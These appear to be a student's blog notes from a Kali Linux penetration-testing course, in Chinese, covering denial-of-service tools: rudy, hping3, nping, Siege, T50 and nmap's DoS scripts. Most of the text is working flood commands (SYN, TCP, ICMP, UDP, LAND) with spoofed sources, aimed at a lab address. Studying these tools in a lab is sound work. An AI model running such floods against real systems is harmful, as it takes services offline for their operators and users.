Kali Linux渗透测试 133 拒绝服务攻击工具

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程web

Kali Linux渗透测试(苑房弘)博客记录安全

1. rudy

1. 简介

  • 慢速应用层HTTP POST攻击,与slowhttptest原理相同
  • 每次只传输一个字节的数据
  • 美剧黑客军团”中曾提到此攻击手段
  • 攻击有表单WEB页面,攻击时需指定攻击的参数名称
  • https://sourceforge.net/projects/r-u-dead-yet/

2. 测试

root@kali:~/rudy# ls
BeautifulSoup.py   README          r-u-dead-yet-v2.2.py  socks.pyc
BeautifulSoup.pyc  rudeadyet.conf  socks.py

修改配置文件网络

root@kali:~/rudy# ./r-u-dead-yet-v2.2.py

2. Hping3

1. 简介

  • 几乎能够定制发送任何 TCP/IP 数据包,用于测试 FW、端口扫描、性能测试并发

  • syn flood 攻击tcp

    • hping3 -c 1000 -d 120 -S -w 64 -p 80 –flood –rand-source 10.10.10.132
    • hping3 -S -P -U -p 80 –flood –rand-source 10.10.10.132
    • hping3 -SARFUP -p 80 –flood –rand-source 10.10.10.132 (TCP Flood)
  • ICMP Flood 攻击svg

    • hping3 -q -n -a 1.1.1.1 –icmp -d 200 –flood 10.10.10.132
  • UDP Flood 攻击工具

    • hping3 -a 1.1.1.1 –udp -s 53 -d 100 -p 53 –flood 10.10.10.132

2. 攻击

  1. syn_flood 攻击性能

    root@kali:~# hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 10.10.10.132

    hping3 -S -P -U -p 80 --flood --rand-source 10.10.10.132

  2. tcp_flood 攻击学习

    root@kali:~# hping3 -SARFUP -p 80 --flood --rand-source 10.10.10.132

  3. icmp_flood 攻击测试

    -a 伪造源地址
    root@kali:~# hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 10.10.10.132

  4. udp_flood 攻击

    root@kali:~# hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 10.10.10.132

3. LAND 攻击

  • 特殊种类的 SYN Flood 攻击
  • 源地址和目的地址都是靶机IP,受害者和本身完成三次握手
  • hping3 -n -a 10.10.10.132 -S -d 100 -p 80 –flood 10.10.10.132

    root@kali:~# hping3 -n -a 10.10.10.132 -S -d 100 -p 80 --flood 10.10.10.132

3. nping

  • TCP 全链接 DoS 攻击

    • nping –tcp-connect –rate=10000 -c 1000000000 -q 10.10.10.132
  • 查公网 IP

    • nping –echo-client “public” echo.nmap.org –udp

4. Siege

  • http/https 压力测试工具,模拟多个用户并发访问请求
  • siege -g http://10.10.10.132
  • siege -i -c 1000 http://10.10.10.132 -A siegehttp
  • 同时攻击多个 url ,使用 -f 调用字典文件
  • 单独使用 siege -i -c 1000 ,也会调用字典文件(url 列表)

    • /etc/siege/urls.txt

      # 查看 banner 信息
      root@kali:~# siege -g http://10.10.10.132

      root@kali:~# siege -i -c 1000 http://10.10.10.132 -A Mozilla/5.0

      root@kali:~# cat /etc/siege/urls.txt

      root@kali:~# siege -i -c 1000

5. T50

  • 网络压力测试

    • t50 10.10.10.132 –flood –turbo -S –protocol TCP –dport 80
    • t50 10.10.10.132 –flood –turbo -S TCP UDP OSPF EIGRP –dport 22

      root@kali:~# t50 10.10.10.132 --flood --turbo -S --protocol TCP --dport 80


6. nmap

root@kali:~# grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
broadcast-avahi-dos.nse
http-slowloris.nse
ipv6-ra-flood.nse
smb-flood.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-regsvc-dos.nse